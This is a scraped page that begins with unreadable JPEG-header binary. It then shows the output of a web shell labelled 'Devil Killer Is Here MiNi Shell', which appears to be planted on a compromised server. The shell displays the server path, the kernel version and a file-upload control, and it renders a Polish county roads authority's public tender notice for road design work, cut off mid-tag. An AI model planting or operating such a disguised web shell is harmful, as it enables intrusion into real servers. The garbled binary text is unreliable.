JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241010/0053987601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Aktualizacja istniejącej dokumentacji projektowej obejmująca odcinek od km 0+000 do km 1+700 dla zadania „Rozbudowa drogi powiatowej nr 1784T (0604T) Jadowniki – Ambrożów”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Starachowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291019637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ostrowiecka 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Starachowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">412730220</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">412730228</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp-starachowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdp-starachowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarząd dróg w odniesieniu do dróg powiatowych w zakresie planowania, budowy, modernizacji, utrzymania i ochrony dróg zgodnie z ustawą o drogach publicznych. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Aktualizacja istniejącej dokumentacji projektowej obejmująca odcinek od km 0+000 do km 1+700 dla zadania „Rozbudowa drogi powiatowej nr 1784T (0604T) Jadowniki – Ambrożów”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1ad9ed08-26ec-495f-8221-af125028eddd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00539876</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00042622/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.12 Aktualizacja istniejącej dokumentacji projektowej obejmująca odcinek od km 0+000 do km 1+700 dla zadania „Rozbudowa drogi powiatowej nr 1784T (0604T) Jadowniki – Ambrożów”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1ad9ed08-26ec-495f-8221-af125028eddd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. <br/>	<br/>Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/><br/>W przedmiotowym postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl/ <br/><br/> Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/><br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. <br/> <br/> Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia , dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/><br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania do Platformy e-Zamówienia.<br/><br/>Komunikacja w postępowaniu z wyłączeniem składania ofert (sposób składania ofert opisano w rozdziale 13 SWZ) odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). <br/><br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. <br/><br/>Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/><br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/><br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/><br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e- Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub droga elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/><br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikacje Wykonawcy i Zamawiającego za pośrednictwem Platformy e- Zamówienia, zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e -mail: sekretariat@zdp-starachowice.pl (nie dotyczy składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że: <br/>	administratorem Pani/Pana danych osobowych jest Dyrektor Zarządu Dróg Powiatowych, 27-200 Starachowice ul. Ostrowiecka 15;<br/><br/>	Inspektorem Ochrony Danych Osobowych w Zarządzie Dróg Powiatowych w Starachowicach jest Pan Zbigniew Kolus, kontakt pod adresem email: iod.rodo.ochrona@gmail.com ;<br/><br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr ZP.2510.20.2024<br/>pn.: Aktualizacja istniejącej dokumentacji projektowej obejmująca odcinek od km 0+000 do km 1+700 dla zadania „Rozbudowa drogi powiatowej nr 1784T (0604T) Jadowniki – Ambrożów”.<br/><br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. -Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320) „Ustawa Pzp”, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy Pzp; <br/><br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i ust. 2 z zastrzeżeniem art.74 ust. 3 i 4. Ustawy Pzp; <br/><br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/><br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/><br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 ust. 1-3 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących.<br/> Pan/Pani jest uprawniony/uprawniona do uzyskania od zamawiającego potwierdzenia czy przetwarzane są jego/jej dane osobowe, a jeżeli ma to miejsce jest uprawniony/ uprawniona do uzyskania dostępu do nich oraz informacji określonych w art. 15 ust.1-3 RODO. <br/>Zamawiający w celu wykonania powyższego obowiązku może żądać od Pana/Pani wskazania dodatkowych informacji mających na celu sprecyzowanie żądania <br/>w szczególności:<br/>podania nazwy lub daty postepowania o udzielenie zamówienia, lub <br/>podania nazwy lub daty zakończonego postepowania o udzielenie zamówienia publicznego;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z Ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 18 RODO posiada Pan/Pani prawo żądania od administratora ograniczenia przetwarzania danych osobowych; <br/>Wystąpienie Pana/Pani z żądaniem ograniczenia przetwarzania danych osobowych <br/>nie ogranicza ich przetwarzania do czasu zakończenia postępowania o udzielenie zamówienia. Od dnia zakończenia postępowania o udzielenie zamówienia wniesienie powyższego żądania spowoduje ograniczenie przetwarzania Pana/Pani danych osobowych zawartych w protokole i załącznikach do protokołu. Zamawiający <br/>nie udostępni tych danych, chyba że zajdą przesłanki o których mowa w art. 18 ust. 2 RODO * <br/><br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/><br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2510.20.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/><br/>Aktualizacja istniejącej dokumentacji projektowej obejmująca odcinek od km 0+000 do km 1+700 dla zadania „Rozbudowa drogi powiatowej nr 1784T (0604T) Jadowniki – Ambrożów”.<br/><br/>W ramach postępowania, w oparciu o istniejący projekt budowlany (aktualizacja dokumentacji), należy wykonać dokumentację projektową rozbudowy drogi powiatowej nr 1784T dla zadania: „Rozbudowa drogi powiatowej nr 1784T (0604T) Jadowniki – Ambrożów”.<br/><br/>W ramach zdania należy wykonać kompleksową dokumentację:<br/><br/>- niezbędną dla uzyskania stosownych decyzji administracyjnych w tym o środowiskowych uwarunkowaniach i o zezwoleniu na realizację inwestycji,<br/><br/>-	niezbędną w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót wykonawczych/budowlanych oraz na etapie wykonywania tych robót.<br/><br/>Zamówienie obejmuje następujący zakres usług:<br/><br/>a)	sporządzenie aktualnego projektu budowlanego w oparciu o istniejący projekt budowlany (aktualizacja dokumentacji) oraz projekty wykonawcze z którymi powinien być zbieżny przebieg trasy; <br/>b)	analizę istniejącego zagospodarowania terenu z uwzględnieniem ustaleń obowiązującego (lub w toku uchwalania) planu miejscowego w obszarze projektowania;<br/>c)	uzyskanie aktualnych podkładów geodezyjnych (map podziałowych, map do celów projektowych) niezbędnych do opracowania projektu budowlanego;<br/>d)	aktualne wypisy i wyrysy z mapy ewidencji gruntów w zakresie inwestycji;<br/>e)	uzyskanie w imieniu inwestora pozwolenia wodnoprawnego lub zgłoszenia wodnoprawnego – jeżeli zajdzie taka potrzeba, zawierającego min: sposób odprowadzenia wód opadowych z pasa drogowego do istniejących naturalnych odbiorników np. istniejących cieków wodnych. Zamawiający ze względu na istniejące przeszkody terenowe takie jak: budynki, studnie itp. dopuszcza zamiast rowów otwartych zastosowanie kanalizacji deszczowej;<br/>f)	aktualizacja istniejącej lub uzyskanie nowej decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia – jeżeli zajdzie taka potrzeba;<br/>g)	uzyskanie odstępstwa od warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie w zakresie szerokości pasa drogowego – jeżeli zajdzie taka potrzeba;<br/>h)	opracowanie aktualizacji projektu budowy kanału technologicznego lub uzyskanie zgody na odstępstwo od wykonania kanału:<br/>i)	uzyskanie aktualizacji warunków technicznych oraz dokonywanie uzgodnień niezbędnych do prawidłowego opracowania dokumentacji projektowej, w tym uzgodnień branżowych takich jak: drogowa, sanitarna, gazowa, elektryczna, oświetlenie uliczne, odwodnienie drogowe, teletechniczna, zieleń i inne;<br/>j)	uzyskanie uzgodnienia projektu zagospodarowania terenu w Urzędzie Gminy <br/>w Pawłowie;<br/>k)	przeprowadzenie minimum dwóch konsultacji społecznych z mieszkańcami <br/>sołectwa Jadowniki;<br/>l)	opracowanie kompletnego projektu budowlanego, łącznie ze wszystkimi załącznikami, decyzjami, opiniami i uzgodnieniami, warunkującymi otrzymanie decyzji ZRID, zgodnie z obowiązującymi w tym zakresie przepisami, wiedzą i zasadami sztuki budowlanej;<br/>m)	ustalenie geotechnicznych warunków posadowienia obiektów budowlanych w oparciu <br/>o Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych (Dz. U. z 2012r. poz. 463);<br/>n)	wykonanie aktualizacji projektów wykonawczych dla wszystkich projektowanych branż w szczególności.: drogowa, sanitarna, gazowa, elektryczna, oświetlenie uliczne, odwodnienie drogowe, teletechniczna, zieleń i inne;<br/>o)	opracowanie aktualizacji kompletnego projektu wykonawczego;<br/>p)	opracowanie kompletnego projektu technicznego;<br/>q)	opracowanie projektów przebudowy urządzeń infrastruktury technicznej niezwiązanych <br/>z potrzebami zarządzania drogami lub potrzebami ruchu drogowego, kolidujących <br/>z inwestycją (projekt budowlany + projekt wykonawczy) jeżeli zajdzie taka potrzeba;<br/>r)	opracowanie projektu stałej organizacji ruchu wraz z uzyskaniem wszelkich niezbędnych opinii, uzgodnień wraz z zatwierdzeniem przez odpowiedni organ administracji; <br/>s)	przygotowanie projektu inwentaryzacji zieleni warunkującej otrzymanie pozwolenia <br/>na wycinkę drzew kolidujących z inwestycją;<br/>t)	opracowanie aktualizacji przedmiarów i kosztorysów inwestorskich dla zadania głównego oraz branży dodatkowych;<br/>u)	aktualizację specyfikacji technicznych, ogólne i szczegółowe wykonania i odbioru robót budowlanych objętych przedmiotem zamówienia, zgodnie z rozdziałem 3 powołanego Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2021r. poz. 2454);<br/>v)	przygotowanie i złożenie w imieniu Zamawiającego kompletnego wniosku o uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID), w zakresie zgodnym <br/>z decyzją środowiskową i decyzją pozwolenie wodnoprawne;<br/>w)	uzyskanie przez Wykonawcę w imieniu Zamawiającego ostatecznej decyzji <br/>o zezwoleniu na realizację inwestycji drogowej (ZRID), w zakresie zgodnym z decyzją środowiskową i pozwoleniem wodnoprawnym.<br/><br/>Przedmiot zamówienia obejmuje ponadto:<br/><br/>a)	wykonanie weryfikacji granic istniejącego pasa drogowego drogi powiatowej <br/>nr 1784T (0604 T) (działka, nr ewid., obręb) na długości projektowanego odcinka drogi (przeprowadzenie procedury ustalenia granic ewidencyjnych w przypadku, gdy nie są one ustalone);<br/>b)	przekazywanie bezzwłocznie kserokopii wszelkich uzyskanych decyzji, warunków, uzgodnień i opinii do Zarządu Dróg Powiatowych w Starachowicach, w terminach umożliwiających ewentualne skorzystanie z trybu odwoławczego (oryginały uzgodnień Wykonawca zobowiązany jest przekazać Zamawiającemu wraz z przekazywaną kompletną dokumentacją);<br/>c)	udzielanie odpowiedzi na etapie postępowania w trybie zamówień publicznych na roboty budowlane. Zamówienie obejmuje również pisemne udzielanie odpowiedzi na zapytania dotyczące projektu zadawane przez wykonawców zainteresowanych udziałem w wyżej wskazanym postępowaniu na realizację robót w oparciu o opracowaną dokumentację oraz modyfikacje dokumentów, których konieczność wynikać będzie z zadawanych pytań;<br/>d)	dokonywanie uzupełnień lub wyjaśnień szczegółowych dotyczących opracowywanej dokumentacji, łącznie z kosztami szacunkowymi planowanej inwestycji na każde żądanie Zamawiającego bez dodatkowych roszczeń finansowych;<br/>e)	dokonywanie uzupełnień lub wyjaśnień szczegółowych dotyczących opracowanej dokumentacji, na każde żądanie Zamawiającego lub Wykonawcy, podczas realizacji robót budowlanych na podstawie tej dokumentacji bez dodatkowych roszczeń finansowych;<br/>f)	sprawowanie nadzoru autorskiego zgodnie z art. 20 ust. 1 pkt. 4 ustawy z dnia <br/>7 lipca 1994 roku Prawo budowlane (Dz. U. 2024r. poz. 725 z późn. zm.) oraz w oparciu o pkt. 8 niniejszej specyfikacji.<br/><br/>Szczegółowy opis usług będących przedmiotem zamówienia zawiera Specyfikacja Techniczna – rozdział III SWZ. Wykonawca zobowiązuje się do wykonania na rzecz Zamawiającego przedmiotu zamówienia zgodnie z zakresem i warunkami określonymi w opisie przedmiotu zamówienia – Specyfikacji Technicznej – rozdział III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Komisja dokona weryfikacji złożonych ofert. W przypadku gdy wykonawca nie złożył wymaganych w postępowaniu oświadczeń, dokumentów lub środków podmiotowych czy też są one niekompletne lub zawierają błędy, Zamawiający wezwie wykonawcę odpowiednio do złożenia, poprawienia lub uzupełnienia brakujących dokumentów. Komisja zweryfikuje oferty pod kątem przesłanek do odrzucenia na podstawie art.226 Ustawy, poprawi w ofertach zgodnie z art. 223 ust.2 Ustawy: oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, nie powodujące istotnych zmian w treści oferty - niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona, a także zwróci się o ewentualne wyjaśnienia dotyczące treści złożonych ofert zgodnie z art. 223 ust. 1 Ustawy oraz ewentualne wyjaśnienia rażąco niskiej ceny, jeżeli zasadne jest wszczęcie procedury określonej w art.224 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 